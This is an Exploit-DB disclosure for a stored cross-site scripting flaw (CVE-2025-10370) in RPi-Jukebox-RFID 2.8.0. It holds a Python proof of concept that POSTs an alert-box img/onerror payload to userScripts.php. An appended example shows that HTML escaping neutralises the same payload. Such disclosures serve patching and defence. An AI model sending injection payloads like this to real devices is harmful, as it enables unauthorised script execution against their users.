
[webapps] RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)

Source: Exploit DB. Archived Mar 16, 2026.



EDB-ID: 52470
CVE: 2025-10370
Author: BEATRIZ FRESNO NAUMOVA
Type: WEBAPPS
Platform: MULTIPLE
Date: 2026-02-02

    # Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370)
    # Date: 2025-09-25
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
    # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
    # Version: 2.8.0
    # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
    # CVE: CVE-2025-10370
    #
    # Description:
    # This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page.
    # The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection
    # of arbitrary JavaScript payloads.

    import requests

    # Change this to the actual IP or hostname of the target device
    TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php"

    # The XSS payload
    PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'

    # HTTP headers
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": TARGET,
    }

    # POST data with the malicious payload
    data = {
        "customScript": PAYLOAD
    }

    def send_exploit():
        print(f"[+] Sending XSS payload to {TARGET}")
        try:
            r = requests.post(TARGET, headers=headers, data=data, timeout=5)
            print(f"[+] Payload sent. Status code: {r.status_code}")
            print("[*] If the target is vulnerable, the payload will execute when the page is rendered.")
        except Exception as e:
            print(f"[-] Exploit failed: {e}")

    if __name__ == "__main__":
        send_exploit()
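The description above attributes the flaw to missing sanitization of "customScript"; this added example (not part of the original entry and not the project's PHP code) models the same value rendered without and with attribute-context output encoding, then parses both results to show what markup a browser would see. TEMPLATE, the function names and the MarkupAudit class are hypothetical, and the template assumes the stored value is echoed into a quoted attribute, which the leading `">` of the PoC payload suggests.

```python
import html
from html.parser import HTMLParser

# Constructed template (assumption): the stored value lands inside a quoted attribute.
TEMPLATE = '<input type="text" name="customScript" value="{value}">'

# Payload string taken verbatim from the PoC on this page.
POC_VALUE = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'


def render_unescaped(value):
    """Model of the flaw: stored value interpolated with no output encoding."""
    return TEMPLATE.format(value=value)


def render_escaped(value):
    """Hardened form: encode &, <, > and both quote characters before output."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


class MarkupAudit(HTMLParser):
    """Records every start tag, any on* event-handler attribute, and the field value."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.handlers = []
        self.field_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, val in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))
            if tag == "input" and name == "value":
                self.field_value = val


def audit(markup):
    """Parse rendered markup and report the elements and handlers it contains."""
    parser = MarkupAudit()
    parser.feed(markup)
    parser.close()
    return {"tags": parser.tags, "handlers": parser.handlers, "value": parser.field_value}


if __name__ == "__main__":
    print("unescaped:", audit(render_unescaped(POC_VALUE)))
    print("escaped:  ", audit(render_escaped(POC_VALUE)))
```

In the escaped rendering the parser sees a single input element whose value round-trips to the original string, so the same `audit` call can serve as a regression check once output encoding is in place.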